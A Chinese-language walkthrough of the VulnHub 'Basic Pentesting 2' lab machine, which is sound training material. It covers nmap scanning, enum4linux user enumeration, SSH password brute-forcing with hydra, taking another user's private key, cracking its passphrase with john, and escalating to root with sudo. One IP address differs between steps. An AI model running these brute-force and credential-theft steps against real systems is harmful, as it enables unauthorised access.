一、靶机下载地址
https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:CB:65:92"
2、端口扫描
# 使用命令
nmap 192.168.145.194 -p- -sV
3、指纹识别
# 使用命令
whatweb 192.168.145.194
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.194"
三、获取shell
1、访问靶机IP地址,提示正在维护
2、查看源码,有一个提示,查看他们的开发笔记
3、拼接并访问development,发现dev.txt和j.txt
4、dev.txt文件的内容
5、j.txt文件的内容
6、大概意思是说-K在说 J 这个用户是一个弱口令,使用kali中的enum4linux工具进行扫描,扫描到了 kay 和 jan,应该就是之前的 K 和 J
# 使用命令
enum4linux 192.168.145.194
7、因为提到了 J 存在弱口令,所以使用hydra工具尝试爆破ssh,密码为:armando
# 使用命令
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.145.146 -t 64
8、尝试使用ssh进行连接,连接成功
四、提权
1、sudo -l 查看当前权限,没有可利用的,查看用户家目录下,在kay目录下发现pass.pak和ssh公私钥文件
# 使用命令
cd /home/kay
ls -al
2、查看pass.pak文件,没有权限
# 使用命令
cat pass.pak
3、进入.ssh目录,发现了私钥文件
# 使用命令
cd .ssh
ls -al
4、查看私钥文件内容
# 使用命令
cat id_rsa
5、将内容复制到 kali 中,并赋予权限
# 使用命令
vim id_rsa
chmod 600 id_rsa
6、尝试利用私钥连接,但是需要密码
# 使用命令
ssh -i id_rsa kay@192.168.145.194
7、利用 ssh2john工具 将 id_rsa
转换为哈希
# 使用命令
ssh2john id_rsa > hash.txt
8、使用 john
工具进行解密,得到密码为 beeswax
9、再次使用私钥登录,登录成功
# 使用命令
ssh -i id_rsa kay@192.168.145.194
10、使用sudo -l命令查看可执行的命令,发现需要密码
11、查看之前的pass.pak
文件,这个可能是需要的密码
12、再次查看权限,输入密码,成功显示
13、直接sudo su
提权,提权成功
# 使用命令
sudo su